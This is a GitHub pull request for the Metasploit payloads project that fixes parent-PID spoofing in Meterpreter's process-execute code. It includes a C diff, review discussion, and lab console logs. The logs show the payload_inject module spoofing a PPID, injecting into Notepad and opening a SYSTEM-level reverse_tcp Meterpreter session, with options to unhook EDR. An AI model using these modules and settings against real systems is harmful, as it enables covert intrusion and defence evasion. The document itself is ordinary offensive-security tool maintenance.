Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Fix PPID spoofing #660

Merged
merged 3 commits into from
Jun 20, 2023
Merged

Fix PPID spoofing #660

merged 3 commits into from
Jun 20, 2023

Conversation

smashery
Copy link
Contributor

This PR fixes rapid7/metasploit-framework#18113.

The commit be44377 introduced the issue by removing the structures required for PPID spoofing. I reverted that commit which fixed the issue. I added back in what I believe to be the intent of that commit: better memory management for the commandLine_w variable.

@smcintyre-r7 smcintyre-r7 self-assigned this Jun 16, 2023
smcintyre-r7
smcintyre-r7 reviewed Jun 16, 2023
View reviewed changes
Copy link
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Tested the code and the changes look good. I just left the one comment.

c/meterpreter/source/extensions/stdapi/server/sys/process/process.c Outdated
@@ -382,11 +388,13 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
}
}

// Try to execute the process with duplicated token
if (!CreateProcessAsUserW(pToken, NULL, commandLine_w, NULL, NULL, inherit, createFlags, pEnvironment, NULL, &si, &pi))
if (!CreateProcessAsUserW(pToken, NULL, commandLine_w, NULL, NULL, inherit, createFlags, pEnvironment, NULL, (LPSTARTUPINFOW)&si, &pi))
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The cast here of si to LPSTARTUPINFOW is concerning. Up to this point si was STARTUPINFOEXA using multi byte strings and not wide strings. Should si be completely switched to STARTUPINFOEXW? If that's the case, you could apply this patch I tested that will switch it to always using the W variant. https://github.com/smcintyre-r7/metasploit-payloads/commit/abd29ba1d709cb5aab08c55704614f38d5788c62.patch

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Yeah that is concerning. I've applied and tested that patch - looks good. Thanks.

smcintyre-r7
smcintyre-r7 approved these changes Jun 20, 2023
View reviewed changes
Copy link
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Changes look good to me. I tested them again with the new patch and everything checks out. I'll have this landed in a moment. Thanks for fixing this!

Before / Unpatched

msf6 exploit(windows/local/payload_inject) > show options 

Module options (exploit/windows/local/payload_inject):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   AUTOUNHOOK   false            no        Auto remove EDRs hooks
   PID          0                no        Process Identifier to inject of process to inject payload. 0=New Process
   PPID         7568             no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
   SESSION      -1               yes       The session to run this module on
   WAIT_UNHOOK  5                yes       Seconds to wait for unhook to be executed


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.250.134  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/payload_inject) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf6 exploit(windows/local/payload_inject) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running module against DC
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: The parameter is incorrect.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/payload_inject) >

After / Patched

[*] Using exploit/windows/local/payload_inject
msf6 exploit(windows/local/payload_inject) > set PPID 3592
PPID => 3592
msf6 exploit(windows/local/payload_inject) > show options 

Module options (exploit/windows/local/payload_inject):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   AUTOUNHOOK   false            no        Auto remove EDRs hooks
   PID          0                no        Process Identifier to inject of process to inject payload. 0=New Process
   PPID         3592             no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
   SESSION                       yes       The session to run this module on
   WAIT_UNHOOK  5                yes       Seconds to wait for unhook to be executed


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.250.134  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/payload_inject) > set SESSION -1
SESSION => -1
msf6 exploit(windows/local/payload_inject) > run

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running module against DC
[*] Spawned Notepad process 1664
[*] Spoofing PPID 3592
[*] Injecting payload into 1664
[*] Preparing 'windows/meterpreter/reverse_tcp' for PID 1664
[*] Sending stage (175686 bytes) to 192.168.250.237
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:61873) at 2023-06-20 13:07:45 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run post/test/cmd_exec

[*] Running against session 2
[*] Session type is meterpreter and platform is windows
[+] should return the result of echo
[+] should return the result of echo with single quotes
[+] should return the result of echo with double quotes
[+] should return the stderr output
[*] Passed: 4; Failed: 0; Skipped: 0
meterpreter > run post/test/file

[*] Running against session 2
[*] Session type is meterpreter and platform is windows
[+] should test for directory existence
[+] should create directories
[+] should list the directory we just made
[+] should recursively delete the directory we just made
[+] should delete a symbolic link target
[+] should not recurse into symbolic link directories
[+] should test for file existence
[+] should create text files
[+] should read the text we just wrote
[+] should append text files
[+] should delete text files
[+] should move files
[+] should write binary data
[+] should read the binary data we just wrote
[+] should delete binary files
[+] should append binary data
[*] Passed: 16; Failed: 0; Skipped: 0
meterpreter > run post/test/meterpreter

[*] Running against session 2
[*] Session type is meterpreter and platform is windows
[+] should enumerate supported core commands
[+] should support 3 or more core commands
[+] should return its own process id
[+] should return a list of processes
[+] should return a user id
[+] should return a sysinfo Hash
[+] should return network interfaces
[+] should have an interface that matches session_host
[+] should return network routes
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[+] should move files
[+] should copy files
[+] should do md5 and sha1 of files
[*] Passed: 20; Failed: 0; Skipped: 0
meterpreter >

@smcintyre-r7 smcintyre-r7 merged commit a15d95e into rapid7:master Jun 20, 2023
3 checks passed
zeroSteiner added a commit to zeroSteiner/metasploit-framework that referenced this pull request Jun 20, 2023
@zeroSteiner
Update metasploit-payloads gem to 2.0.143
5d96b23 
Includes changes from:
* rapid7/metasploit-payloads#662
* rapid7/metasploit-payloads#660
@zeroSteiner zeroSteiner mentioned this pull request Jun 20, 2023
Merged
sempervictus pushed a commit to sempervictus/metasploit-framework that referenced this pull request Aug 1, 2023
@zeroSteiner
Update metasploit-payloads gem to 2.0.143
57a47ba 
Includes changes from:
* rapid7/metasploit-payloads#662
* rapid7/metasploit-payloads#660
JustAnda7 pushed a commit to JustAnda7/metasploit-framework that referenced this pull request Sep 20, 2023
@zeroSteiner @JustAnda7
Update metasploit-payloads gem to 2.0.143
db2485d 
Includes changes from:
* rapid7/metasploit-payloads#662
* rapid7/metasploit-payloads#660
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@smcintyre-r7 smcintyre-r7 smcintyre-r7 approved these changes

Assignees

@smcintyre-r7 smcintyre-r7

Labels
bug windows
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

Parent PID spoofing fails
2 participants
@smashery @smcintyre-r7